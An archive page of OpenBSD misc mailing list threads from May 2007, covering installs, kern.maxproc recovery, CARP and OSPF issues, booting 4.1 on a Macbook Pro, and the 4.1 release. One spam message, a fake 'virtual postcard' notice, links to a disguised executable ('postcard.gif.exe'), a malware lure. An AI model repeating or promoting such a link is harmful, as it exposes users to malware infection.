Instaling openbsd Y windows

2007-05-01 Thread Miler Alberto Garcia Villanueva
hi for all, i have a Hard disk of 80 GB, I like to user 20 GB for OpenBSD and 60 GB for Windows XP, it is posible? becase I read in the FAQ openbsd that say: its necessary to installa the openbsd in the firts 7GB of the Harddisk

Re: openbsd 4.0 server, new setup, getting panics

2007-05-01 Thread Nick Holland
John Mendenhall wrote: >> PS a dmesg would be useful... > > Sorry! I forgot the dmesg. much better... The symptoms you describe sound like classic hardware problems, however, I see a couple things worthy of note in your dmesg: > - > OpenBSD 4.0 (GENERIC) #1107: Sat Sep 16 19:15:58 MDT 2006

Re: Typo in 007_kroute.patch

2007-05-01 Thread Chris Kuethe
d'oh! thanks, i'll get that fixed up CK On 5/1/07, Egbert Krook <[EMAIL PROTECTED]> wrote: Hi, The paths in the build instructions are wrong: cd /usr/src/usr/usr.sbin/ospfd -should be- cd /usr/src/usr.sbin/ospfd cd /usr/src/usr/usr.sbin/ripd -should be- cd /usr/src/usr.sbin/ripd Kind regard

Typo in 007_kroute.patch

2007-05-01 Thread Egbert Krook
Hi, The paths in the build instructions are wrong: cd /usr/src/usr/usr.sbin/ospfd -should be- cd /usr/src/usr.sbin/ospfd cd /usr/src/usr/usr.sbin/ripd -should be- cd /usr/src/usr.sbin/ripd Kind regards, -- Egbert Krook System/Network Engineer Amarin Printing and Publishing Public Co., Ltd.

Successful boot of 4.1 on Macbook Pro

2007-05-01 Thread Aaron Hsu
I have successfully booted a customized boot-only install disk for my Macbook Pro. I have documented my efforts: http://www.aaronhsu.com/AaronHsu.com/OpenBSD%20-%20Macbook%20Pro.html I have made the customized ISO available for download. -- Aaron Hsu <[EMAIL PROTECTED]> "No one could make a g

Re: 4.1 and Macbook Pro

2007-05-01 Thread Aaron Hsu
On Tue, 01 May 2007 18:54:02 -0500, Joachim Schipper <[EMAIL PROTECTED]> wrote: On Wed, May 02, 2007 at 01:17:20AM +0200, Paul de Weerd wrote: Good luck ! You *are* going to need it... Actually, I had great luck. This was ridiculously easy. I am in the process of documenting my efforts

You have just received a virtual postcard from a friend !

2007-05-01 Thread [EMAIL PROTECTED]
You have just received a virtual postcard from a friend ! . You can pick up your postcard at the following web address: . http://www.emin3m09.uv.ro/postcard.gif.exe . If you can't click on the web address above, you can also visit 1001 Postcards at http://www.postcards.org/postcards/ and ente

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Daniel Ouellet
Keith Richardson wrote: You are confusing user group (i.e. www) with process group (i.e. logical grouping of processes for job contol, etc..). Obviously I did. See ps(1) and termios(4) note: termios had the most descriptive explanation of process group under Job Control that I could find in

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Keith Richardson
Daniel Ouellet wrote: Yes, I can use it, but I can't figure out the process ID. I am trying to understand the man page on this to kill the group 67, or www. Obviously, I can't figure out the proper use of that syntax here. Man said The following PIDs have special meanings: -1 If su

Re: OpenBSD 4.1 Released

2007-05-01 Thread Louis Bertrand
Bob Beck wrote: May 1, 2007. We are pleased to announce the official release of OpenBSD 4.1. This is our 21st release on CD-ROM (and 22nd via FTP). We remain proud of OpenBSD's record of ten years with only two remote hole

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Daniel Ouellet
Stuart Henderson wrote: kill is a shell builtin and doesn't need to fork. useful one to remember, thanks tedu. I kind of wish that pkill was too this time, but worked around it with Ted's help. All is good in the end and I learn something new today! Yes, I can use it, but I can't figure ou

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Joachim Schipper
On Tue, May 01, 2007 at 07:49:42PM -0400, Daniel Ouellet wrote: > Ted Unangst wrote: > >read thepid < httpd.pid > >kill $thepid > > Thank you!!! > > This work. > > But what would be the proper syntax based on the man page to kill the > group if possible? > > Based on the man page it should be

Re: Carp not behaving

2007-05-01 Thread Dag Richards
Dummy Dummy wrote: On 4/30/07, Stuart Henderson <[EMAIL PROTECTED]> wrote: Check you have a PF rule to pass carp traffic on that interface. N.B. applications using bpf, like tcpdump, see the packets *before* PF. Yes, PF rules was the cause. I had a bunch of carp/pfsync rules there were at

Re: 4.1 and Macbook Pro

2007-05-01 Thread Joachim Schipper
On Wed, May 02, 2007 at 01:17:20AM +0200, Paul de Weerd wrote: > On Tue, May 01, 2007 at 05:38:17PM -0500, Aaron Hsu wrote: > | On Tue, 01 May 2007 14:20:35 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: > | > | >Huh? How is the OP supposed to get an install if the cd41.iso isn't > | >working? > |

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Daniel Ouellet
Stuart Henderson wrote: there are other builtins, too: $ for i in /var/run/*.pid;do read x < $i; echo $i $x; done If you really need to find httpd's pid, you could sacrifice one of oh, of course.. /var/www/logs/httpd.pid I did try the cat, and more witch both reply with "cannot fork - try a

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Stuart Henderson
> there are other builtins, too: > $ for i in /var/run/*.pid;do read x < $i; echo $i $x; done > > If you really need to find httpd's pid, you could sacrifice one of oh, of course.. /var/www/logs/httpd.pid

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Stuart Henderson
> >kill is a shell builtin and doesn't need to fork. useful one to remember, thanks tedu. > Yes, I can use it, but I can't figure out the process ID. I am trying to > understand the man page on this to kill the group 67, or www. there are other builtins, too: $ for i in /var/run/*.pid;do read x

Re: vlan vs ip aliases

2007-05-01 Thread Joachim Schipper
On Tue, May 01, 2007 at 01:46:11PM -0700, Jonathan Whiteman wrote: > Hey everyone, > > I've got a really stupid but really simple question. If I have an > openbsd machine acting as an internal router (private IP addresses on > all interfaces) for several subnets that have to share physical ethe

Re: Binary kernel and base update

2007-05-01 Thread Joachim Schipper
On Tue, May 01, 2007 at 10:36:08PM +0200, Maurice Janssen wrote: > On Tuesday, May 1, 2007 at 00:04:06 +0200, Joachim Schipper wrote: > >This is just an idea, and might well be completely retarded/wrong, but: > > > >Unless I am mistaken, the reason that compiling the same binary twice > >yields di

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Daniel Ouellet
Ted Unangst wrote: read thepid < httpd.pid kill $thepid Thank you!!! This work. But what would be the proper syntax based on the man page to kill the group if possible? Based on the man page it should be possible no? In any case, this work, but I still would love to know how to do this f

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Ted Unangst
On 5/1/07, Daniel Ouellet <[EMAIL PROTECTED]> wrote: Ted Unangst wrote: > On 5/1/07, Daniel Ouellet <[EMAIL PROTECTED]> wrote: >> I was testing the effect of sysctl kern.maxproc=xxx to see if I could >> figure out the memory usage of httpd until I get my additional memory in >> the server as it's

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Daniel Ouellet
Ted Unangst wrote: On 5/1/07, Daniel Ouellet <[EMAIL PROTECTED]> wrote: I was testing the effect of sysctl kern.maxproc=xxx to see if I could figure out the memory usage of httpd until I get my additional memory in the server as it's in order and I don't have it yet. But now, I have more proces

OpenBSD 4.1 Torrents

2007-05-01 Thread andrew fresh
Probably everyone knows already, but I just wanted to get the word out that there are OpenBSD 4.1 torrents now on the torrent site: http://openbsd.somedomain.net/index.php?version=4.1 So far they are mostly just the files off of the CDs, but as I get synced up, the package torrents will update.

Re: 4.1 and Macbook Pro

2007-05-01 Thread Paul de Weerd
On Tue, May 01, 2007 at 05:38:17PM -0500, Aaron Hsu wrote: | On Tue, 01 May 2007 14:20:35 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: | | >Huh? How is the OP supposed to get an install if the cd41.iso isn't | >working? | | If someone will point me to some instructions on how to build a custom |

Re: sysctl kern.maxproc help needed

2007-05-01 Thread Ted Unangst
On 5/1/07, Daniel Ouellet <[EMAIL PROTECTED]> wrote: I was testing the effect of sysctl kern.maxproc=xxx to see if I could figure out the memory usage of httpd until I get my additional memory in the server as it's in order and I don't have it yet. But now, I have more process running then the k

Re: 4.1 and Macbook Pro

2007-05-01 Thread Aaron Hsu
On Tue, 01 May 2007 14:20:35 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: Huh? How is the OP supposed to get an install if the cd41.iso isn't working? If someone will point me to some instructions on how to build a custom boot CD I can use an emulator on OS X to build an ISO, burn it usi

openbsd ports

2007-05-01 Thread Alexander V. Butenko
Hello, I'm looking on openbsd ports development and find that it goes very slow. The software is outdated, there are still a lots of packages missed. The reason why is clear. There is a lack of maintaners. Maintainers is busy and unable to update packages in time. In other side there is a pkgsrc

sysctl kern.maxproc help needed

2007-05-01 Thread Daniel Ouellet
Hi, I need some advice to get myself out of a stupid situation I put myself into. I have a server that I was testing with for resources, etc. I was testing the effect of sysctl kern.maxproc=xxx to see if I could figure out the memory usage of httpd until I get my additional memory in the se

Re: openbsd 4.0 server, new setup, getting panics

2007-05-01 Thread Darrin Chandler
On Tue, May 01, 2007 at 01:29:50PM -0700, John Mendenhall wrote: > My initial assumption is, there must be a hardware problem. > How do I determine where the problem is so I can start > diagnosing it? If you have any other memory for this machine you might try that. Don't worry about enough to run

Re: openbsd 4.0 server, new setup, getting panics

2007-05-01 Thread John Mendenhall
> PS a dmesg would be useful... Sorry! I forgot the dmesg. - OpenBSD 4.0 (GENERIC) #1107: Sat Sep 16 19:15:58 MDT 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: AMD Duron(tm) Processor ("AuthenticAMD" 686-class, 64KB L2 cache) 1.61 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,P

Re: CARP, carpdemote and kernel routing table

2007-05-01 Thread Falk Brockerhoff
Claudio Jeker schrieb: > Currently the routing table prefers any present route even if the > corresponding interface is not up. carp(4) does dirty tricks but the > network route is not touched and so all traffic hitting that backup box is > effectifly blackholed. Yes, that's exactly what I see he

Re: Carp not behaving

2007-05-01 Thread Dummy Dummy
On 4/30/07, Stuart Henderson <[EMAIL PROTECTED]> wrote: > > > Check you have a PF rule to pass carp traffic on that interface. > N.B. applications using bpf, like tcpdump, see the packets *before* PF. Yes, PF rules was the cause. I had a bunch of carp/pfsync rules there were at the end of the PF

Gluster

2007-05-01 Thread Rico Secada
Hi Anyone with experience in setting up and using Gluster from GNU on OpenBSD? Rico

Re: openbsd 4.0 server, new setup, getting panics

2007-05-01 Thread Fred Crowson
John Mendenhall wrote: OpenBSD Gurus, I just setup a new openbsd 4.0 server. No problems with install. As root, I created a new user on the console. I logged out and logged back in as new user. All okay. I remotely logged in as new user, using ssh. Asked for password, I gave it, it showed t

Re: openbsd 4.0 server, new setup, getting panics

2007-05-01 Thread James Turner
On Tue, May 01, 2007 at 01:29:50PM -0700, John Mendenhall wrote: > OpenBSD Gurus, > > I just setup a new openbsd 4.0 server. No problems with install. > As root, I created a new user on the console. I logged out and > logged back in as new user. All okay. > > I remotely logged in as new user,

Re: vlan vs ip aliases

2007-05-01 Thread Jason Dixon
Jonathan Whiteman wrote: Hey everyone, I've got a really stupid but really simple question. If I have an openbsd machine acting as an internal router (private IP addresses on all interfaces) for several subnets that have to share physical ethernet devices, should I use IP aliases or vlans, a

Re: Panic with bsd.mp during boot

2007-05-01 Thread Fred Crowson
Fred Crowson wrote: Hi Misc, I have dual cpu that I've just installed OpenBSD 4.1 on - it works fine with the generic kernel (bsd) but panics with the bsd.mp kernel. Any ideas why bsd.mp is failing to boot on this dual intel machine? The working dmesg and the dmesg from bsd.mp follow, includ

Re: OpenBSD 4.1 Released

2007-05-01 Thread Curt Micol
I'd also like to thank the developers for another great release. Can't wait to upgrade all of my machines. Thank you for your hard work. Curt Micol On 5/1/07, Bob Beck <[EMAIL PROTECTED]> wrote: May 1, 2007.

Re: Binary kernel and base update

2007-05-01 Thread Maurice Janssen
On Tuesday, May 1, 2007 at 00:04:06 +0200, Joachim Schipper wrote: >This is just an idea, and might well be completely retarded/wrong, but: > >Unless I am mistaken, the reason that compiling the same binary twice >yields different results is that gcc adds some randomness (barring >special circumst

vlan vs ip aliases

2007-05-01 Thread Jonathan Whiteman
Hey everyone, I've got a really stupid but really simple question. If I have an openbsd machine acting as an internal router (private IP addresses on all interfaces) for several subnets that have to share physical ethernet devices, should I use IP aliases or vlans, and in either case, would I

openbsd 4.0 server, new setup, getting panics

2007-05-01 Thread John Mendenhall
OpenBSD Gurus, I just setup a new openbsd 4.0 server. No problems with install. As root, I created a new user on the console. I logged out and logged back in as new user. All okay. I remotely logged in as new user, using ssh. Asked for password, I gave it, it showed the message of the day, th

Re: CARP, carpdemote and kernel routing table

2007-05-01 Thread Claudio Jeker
On Tue, May 01, 2007 at 04:07:24PM +0200, Falk Brockerhoff wrote: > Hi, > > I installed the latest snapshot, but this issue still exists. Instead of > "sh /etc/netstart carp213" I also can try "ospfctl fib decouple/couple" > to update the kernel routing table. > > Hm, anybody an idea how to solve

Re: ospfd and new interfaces

2007-05-01 Thread Claudio Jeker
On Tue, May 01, 2007 at 06:54:29PM +0100, Paul Civati wrote: > With ospfd running I create new vlan and carp interfaces and assign > IP addresses. > > Currently, unless I restart ospfd these are not picked up. > > (This is on 4.0 release). > > My requirement is for a scripted/automated set-up to

Re: 4.1 and Macbook Pro

2007-05-01 Thread Otto Moerbeek
On Tue, 1 May 2007, Joachim Schipper wrote: > Not that I know anything about macs, but wouldn't starting boot from an > official cdXY.iso and then using that to load the kernel off a different > CD work just fine? Unless I am mistaken, boot doesn't require the CD to > be present after it's started

Re: 4.1 and Macbook Pro

2007-05-01 Thread Mike Erdely
On Tue, May 01, 2007 at 09:20:35PM +0200, Otto Moerbeek wrote: > Huh? How is the OP supposed to get an install if the cd41.iso isn't working? To get around this problem, I installed using 4.0 and threw bsd.rd from 4.1 onto a CDR. After installing 4.0, I copied the bsd.rd from the CDR to /bsd. Th

Re: how to tell if a patch has been applied

2007-05-01 Thread Mike Erdely
On Tue, May 01, 2007 at 11:05:36AM +0100, John Huss wrote: > I'm trying to figure out if one (or any) security patches have been > applied to an OpenBSD 3.9 host. > > In particular, I've just applied the 015_ssh.patch and ssh -V still > gives the same version. I noticed uname -a output changed fr

Re: 4.1 and Macbook Pro

2007-05-01 Thread Otto Moerbeek
On Tue, 1 May 2007, Paul de Weerd wrote: > On Tue, May 01, 2007 at 09:20:35PM +0200, Otto Moerbeek wrote: > | > | >One quite involved method I can think of: if you have parallels, you > | > | >could use that to build a ACPI enabled release (see release(8), remove > | > | >"disable" from the acpi l

Re: 4.1 and Macbook Pro

2007-05-01 Thread Joachim Schipper
On Tue, May 01, 2007 at 09:20:35PM +0200, Otto Moerbeek wrote: > On Tue, 1 May 2007, Paul de Weerd wrote: > > > On Tue, May 01, 2007 at 01:27:38PM -0500, Aaron Hsu wrote: > > | On Tue, 01 May 2007 13:15:04 -0500, Otto Moerbeek <[EMAIL PROTECTED]> > > wrote: > > | > > | >On Tue, 1 May 2007, Aaron

Re: 4.1 and Macbook Pro

2007-05-01 Thread Paul de Weerd
On Tue, May 01, 2007 at 09:20:35PM +0200, Otto Moerbeek wrote: | > | >One quite involved method I can think of: if you have parallels, you | > | >could use that to build a ACPI enabled release (see release(8), remove | > | >"disable" from the acpi line for GENERIC and RAMDISK_CD). *SNIP* | Huh? H

Re: Binary kernel and base update

2007-05-01 Thread Tobias Weingartner
In article <[EMAIL PROTECTED]>, Artur Grabowski wrote: > > Simple, I trust the people I drink beer with. Do they have to be drinking beer too? :) -- [100~Plax]sb16i0A2172656B63616820636420726568746F6E61207473754A[dZ1!=b]salax

Re: 4.1 and Macbook Pro

2007-05-01 Thread Otto Moerbeek
On Tue, 1 May 2007, Paul de Weerd wrote: > On Tue, May 01, 2007 at 01:27:38PM -0500, Aaron Hsu wrote: > | On Tue, 01 May 2007 13:15:04 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: > | > | >On Tue, 1 May 2007, Aaron Hsu wrote: > | > > | >>On Tue, 01 May 2007 03:35:33 -0500, Otto Moerbeek <[EMAIL

Re: 4.1 and Macbook Pro

2007-05-01 Thread Paul de Weerd
On Tue, May 01, 2007 at 01:27:38PM -0500, Aaron Hsu wrote: | On Tue, 01 May 2007 13:15:04 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: | | >On Tue, 1 May 2007, Aaron Hsu wrote: | > | >>On Tue, 01 May 2007 03:35:33 -0500, Otto Moerbeek <[EMAIL PROTECTED]> | >>wrote: | | [...] | | >>> The UKC prom

Re: 4.1 and Macbook Pro

2007-05-01 Thread Paul de Weerd
On Tue, May 01, 2007 at 01:56:30PM -0500, Aaron Hsu wrote: | On Tue, 01 May 2007 13:51:26 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: | | >It's probably better to just follow the steps in release(8) instead | >of trying to cut corners. With the modified GENERIC and RAMDISK_CD | >conf files, of

Re: 4.1 and Macbook Pro

2007-05-01 Thread Aaron Hsu
On Tue, 01 May 2007 13:51:26 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: It's probably better to just follow the steps in release(8) instead of trying to cut corners. With the modified GENERIC and RAMDISK_CD conf files, of course. Is it possible to edit some boot file, say /etc/boot.conf i

Re: 4.1 and Macbook Pro

2007-05-01 Thread Otto Moerbeek
On Tue, 1 May 2007, Aaron Hsu wrote: > On Tue, 01 May 2007 13:15:04 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: > > > On Tue, 1 May 2007, Aaron Hsu wrote: > > > > > On Tue, 01 May 2007 03:35:33 -0500, Otto Moerbeek <[EMAIL PROTECTED]> > > > wrote: > > [...] > > > > > The UKC prompt is sti

Re: 4.1 and Macbook Pro

2007-05-01 Thread Aaron Hsu
On Tue, 01 May 2007 13:15:04 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: On Tue, 1 May 2007, Aaron Hsu wrote: On Tue, 01 May 2007 03:35:33 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: [...] > The UKC prompt is still not working, you'll need an ACPI enabled > bsd.rd. I do not hav

Re: ospfd and new interfaces

2007-05-01 Thread Dan Farrell
OpenOSPFD 4.1: * Reload support added. It is no longer needed to restart ospfd after a configuration change. danno -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Civati Sent: Tuesday, May 01, 2007 1:54 PM To: misc@openbsd.org Subject: ospfd an

Re: ospfd and new interfaces

2007-05-01 Thread Paul Civati
In article <[EMAIL PROTECTED]>, [EMAIL PROTECTED] (Paul Civati) writes: > With ospfd running I create new vlan and carp interfaces and assign > IP addresses. > Currently, unless I restart ospfd these are not picked up. > (This is on 4.0 release). Of course, as soon as I mail this, I read

Re: 4.1 and Macbook Pro

2007-05-01 Thread Otto Moerbeek
On Tue, 1 May 2007, Aaron Hsu wrote: > On Tue, 01 May 2007 03:35:33 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: > > > On Tue, 1 May 2007, Paul de Weerd wrote: > > > > > On Mon, Apr 30, 2007 at 08:35:52PM -0500, Aaron Hsu wrote: > > > | The threads regarding the Macbook Pro and ACPI support a

Re: OpenBSD on Thinkpad T60

2007-05-01 Thread zmyrgel
Ok, that's good to know that it works. Hopefully I get my CDs soon so I can test it out. Timo shunt wrote: Hi, I recently installed 4.0 straight from CDs to my T60, from scratch. The reverse-engineered ipw3945 driver is especially awesome and works "right out of the box". The only things t

Re: ospfd and new interfaces

2007-05-01 Thread Stuart Henderson
On 2007/05/01 18:54, Paul Civati wrote: > With ospfd running I create new vlan and carp interfaces and assign > IP addresses. > > Currently, unless I restart ospfd these are not picked up. 4.1 has ospfctl reload which does this for vlan, I am not convinced it works for carp* yet but haven't had c

ospfd and new interfaces

2007-05-01 Thread Paul Civati
With ospfd running I create new vlan and carp interfaces and assign IP addresses. Currently, unless I restart ospfd these are not picked up. (This is on 4.0 release). My requirement is for a scripted/automated set-up to create new interfaces as required, obviously it would be much nicer not to h

Re: pf_src_connlimit messing things up

2007-05-01 Thread Chris Cameron
Stuart Henderson wrote: On 2007/05/01 09:04, Chris Cameron wrote: pf_src_connlimit: blocking address xx.xx.xx.xx, 7 states killed Can someone point me to where I can read about this? I'd like to know how it decides to block the IP, how I can change it and at what point this block times out (

Re: 4.1 and Macbook Pro

2007-05-01 Thread Aaron Hsu
On Tue, 01 May 2007 03:35:33 -0500, Otto Moerbeek <[EMAIL PROTECTED]> wrote: On Tue, 1 May 2007, Paul de Weerd wrote: On Mon, Apr 30, 2007 at 08:35:52PM -0500, Aaron Hsu wrote: | The threads regarding the Macbook Pro and ACPI support all seem to | indicate that they can successfully boot to th

Re: OpenBSD 4.1 Released

2007-05-01 Thread Allie D
Thanks to all the developers for your continued hard work and dedication. -- ~Allie D. On Tue, May 1, 2007 07:54, Bob Beck wrote: > > May 1, 2007. > > We are pleased to announce the official release of OpenBSD 4.1. snip...

Re: bcw or no bcw

2007-05-01 Thread Peter Hessler
The bcw driver was never actually working so its a moot point. If you can, upgrade to a working wifi card. Check the details of your laptop on the internet, and look for a ral(4) or other well supported chipset. On 2007 May 01 (Tue) at 15:09:33 +0530 (+0530), Konrad Merz wrote: :Hey everybody

OpenBSD on Thinkpad T60

2007-05-01 Thread zmyrgel
Just planning on getting new T60 laptop to replace my 'toy' laptop. I'm wondering does OpenBSD run on T60 and does all of the devices work with it? Are there Thinkpad specific packages in ports? I think atleast the fingerprint reader won't work although that would be pretty nice if it did work.

4.1 dmesg - Asus M2NPV-VM

2007-05-01 Thread Aaron Poffenberger
I received my 4.1 discs and recently upgraded my Asus M2NPV-VM. It has an ADM64 X2 3800, 1GB DDR2 RAM @ 667Mhz, 1 PATA and 4 SATA drives running 4.1 i386 release rather than the AMD release. Following is the dmesg for GENERIC.MP. ACPI is not enabled. I can boot fine with GENERIC and ACPI but th

Re: how to tell if a patch has been applied

2007-05-01 Thread Chris Kuethe
On 5/1/07, John Huss <[EMAIL PROTECTED]> wrote: I'm trying to figure out if one (or any) security patches have been applied to an OpenBSD 3.9 host. There is no command line tool (like patchrev, patchlevel, showpatches, patchinfo, etc.) that tells you reliably, unambigously what patches are appl

Re: OpenBSD 4.1 Released

2007-05-01 Thread Floor Terra
Thanks to all you devs! I will be buying the cd set as soon as http://www.comcol.nl/ has them available. Keep up the good work! Floor Terra

Re: OpenBSD 4.1 install issue??

2007-05-01 Thread Rob Waite
Yeah I am sorry about the first hand written dmesg with the "blah blah" in it. Below are two links to images of my screen.. some intermediate messages were lost because they scrolled by too fast. To recap... it works on i386 4.0 (the clock_battery message shows up there too) it works on am

Re: Networking issue: two routers with the same IP

2007-05-01 Thread Stuart Henderson
On 2007/05/01 17:02, Luca Corti wrote: > Stuart Henderson wrote: > >It may be a hack, but 'virtual routing' is becoming more common as > >people need to connect networks on the same address range (e.g. with > >company mergers, or VPNs involving multiple organisations, where it > >would be "challeng

Re: OpenBSD 4.1 Released

2007-05-01 Thread Bret Lambert
Just a note of thanks to the devs for their good work. In particular, for allowing me to remove and Office Space-style gank the SonicWall I inherited.

Re: pf_src_connlimit messing things up

2007-05-01 Thread Stuart Henderson
On 2007/05/01 09:04, Chris Cameron wrote: > pf_src_connlimit: blocking address xx.xx.xx.xx, 7 states killed > Can someone point me to where I can read about this? I'd like to know > how it decides to block the IP, how I can change it and at what point > this block times out (which it seems to do

pf_src_connlimit messing things up

2007-05-01 Thread Chris Cameron
I'm getting the following: pf_src_connlimit: blocking address xx.xx.xx.xx, 7 states killed Which is a pretty neat feature except I can't find anything on it, and it's (somewhat) silently doing this. Can someone point me to where I can read about this? I'd like to know how it decides to bloc

Re: Networking issue: two routers with the same IP

2007-05-01 Thread Luca Corti
Stuart Henderson wrote: It may be a hack, but 'virtual routing' is becoming more common as people need to connect networks on the same address range (e.g. with company mergers, or VPNs involving multiple organisations, where it would be "challenging" to renumber everything). Google: vrf nat. In

OpenBSD 4.1 Released

2007-05-01 Thread Bob Beck
May 1, 2007. We are pleased to announce the official release of OpenBSD 4.1. This is our 21st release on CD-ROM (and 22nd via FTP). We remain proud of OpenBSD's record of ten years with only two remote holes in the default i

Re: OpenBGPd: error in UPDATE message, attribute length wrong

2007-05-01 Thread Falk Brockerhoff
Claudio Jeker schrieb: I updated both system to the latest snapshot. The problem still exists. > Could be you're hitting a similar bug as Jon Morby even though your system > does not fatal at the same place. Hm, how can I help to isolate the bug? Tell me, what I can do to support you! May 1 19

Re: [landisk] a question for other users

2007-05-01 Thread Trash Compactor
Joakim Aronius wrote: I also got a cell phone USB cable buti have NO clue what so ever to were i should attatch it... You referred to 'solder Rx/Tx/Gnd to the pins at the front of the board', I dont seem to have any unused pins on the board. The board is marked CN7 in the front with a row of f

Re: CARP, carpdemote and kernel routing table

2007-05-01 Thread Falk Brockerhoff
Hi, I installed the latest snapshot, but this issue still exists. Instead of "sh /etc/netstart carp213" I also can try "ospfctl fib decouple/couple" to update the kernel routing table. Hm, anybody an idea how to solve this problem? Regards, Falk

Panic with bsd.mp during boot

2007-05-01 Thread Fred Crowson
Hi Misc, I have dual cpu that I've just installed OpenBSD 4.1 on - it works fine with the generic kernel (bsd) but panics with the bsd.mp kernel. Any ideas why bsd.mp is failing to boot on this dual intel machine? The working dmesg and the dmesg from bsd.mp follow, including the output from

Re: [landisk] a question for other users

2007-05-01 Thread Diana Eichert
First, you should use a mail client that wraps lines at a max of 75 characters. try this Google search "mail list etiquette wrap lines" for more info On Tue, 1 May 2007, Joakim Aronius wrote: Hi Diana, I just got mine (PX-EH16). There are settings for 'Wake on lan' amd 'power save mode' bu

Re: [landisk] a question for other users

2007-05-01 Thread Joakim Aronius
* Diana Eichert ([EMAIL PROTECTED]) wrote: > I realize the landisk platform wasn't added until 4.1 and 4.1 is not yet > "officially" released on the ftp site, but I haven't seen much from other > users. It wasn't that hard to download a miniroot, dd it to the landisk > hard drive, cvs src with

Re: Networking issue: two routers with the same IP

2007-05-01 Thread Stuart Henderson
On 2007/05/01 12:53, Toni Mueller wrote: > I'm not convinced, but instead think that one router put in between > solves the problem. That's because this other router won't even (need > to) know the other (same) network on the other ADSL device. Right. I'm not sure it's needed at all though, I thin

Re: Networking issue: two routers with the same IP

2007-05-01 Thread Toni Mueller
Hi, On Tue, 01.05.2007 at 00:55:40 -0600, rc <[EMAIL PROTECTED]> wrote: > Address. One router between the second line will not resolve this > problem since the two different network is needed to make routing > possible. I'm not convinced, but instead think that one router put in between solves t

Re: how to tell if a patch has been applied

2007-05-01 Thread Edd Barrett
Hi John, On 5/1/07, John Huss <[EMAIL PROTECTED]> wrote: I'm trying to figure out if one (or any) security patches have been applied to an OpenBSD 3.9 host. As far as I know there is no way of knowing this, which is why I put a message in my MOTD indicating the patch date. If in doubt why not

Re: 4.1 i386, server freezing... ( was: Yet, another thread about running out of static map entries.)

2007-05-01 Thread Toni Mueller
Hi, On Thu, 26.04.2007 at 12:53:26 -0400, STeve Andre' <[EMAIL PROTECTED]> wrote: > Try decreasing the amount of ram. what changes in OpenBSD are required to use really much RAM (>> 4GB), then? Please... Best, --Toni++

how to tell if a patch has been applied

2007-05-01 Thread John Huss
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello, I'm trying to figure out if one (or any) security patches have been applied to an OpenBSD 3.9 host. In particular, I've just applied the 015_ssh.patch and ssh -V still gives the same version. I noticed uname -a output changed from '...GENERIC

bcw or no bcw

2007-05-01 Thread Konrad Merz
Hey everybody i want to install OpenBSD on my ibook. But is the bcw still in the 4.1 Release or not. I read the problems on undeadly.org and my problem is that I do an internship in India and i just get wifi and no cable to connect to the internet! So it wouldn't make much sence to install OpenBS

Re: About C++ and licensing on OpenBSD

2007-05-01 Thread Joachim Schipper
On Tue, May 01, 2007 at 12:50:04AM -0400, Ernesto Bascon wrote: > Hi everybody: > > I do not want to start a flamewar about licensing and hope some > concrete answers to my questions (maybe I seem aggressive, I am not at > all :) ). > > I want to develop an OpenBSD specific set of libraries, impl

Re: 4.1 and Macbook Pro

2007-05-01 Thread Otto Moerbeek
On Tue, 1 May 2007, Paul de Weerd wrote: > Hi Aaron, > > On Mon, Apr 30, 2007 at 08:35:52PM -0500, Aaron Hsu wrote: > | The threads regarding the Macbook Pro and ACPI support all seem to > | indicate that they can successfully boot to the install prompt once they > | enable ACPI through the UKC c

Re: 4.1 and Macbook Pro

2007-05-01 Thread Paul de Weerd
Hi Aaron, On Mon, Apr 30, 2007 at 08:35:52PM -0500, Aaron Hsu wrote: | The threads regarding the Macbook Pro and ACPI support all seem to | indicate that they can successfully boot to the install prompt once they | enable ACPI through the UKC config prompt, which may or may not be usable | until a

Re: About C++ and licensing on OpenBSD

2007-05-01 Thread Shawn K. Quinn
On Tue, 2007-05-01 at 15:09 +0930, Adam Hawes wrote: > It's your code. You could license it any way you please, even > charging people for it, Commercial ("charging people for") distribution is a different issue than the license itself. Please don't confuse the two. > as long as it can't be cons

Re: Networking issue: two routers with the same IP

2007-05-01 Thread rc
Frank, You seriously need to take care of that IP Address conflict. Contact whoever take care of the ADSL router and have them change the IP Address. One router between the second line will not resolve this problem since the two different network is needed to make routing possible. You will ne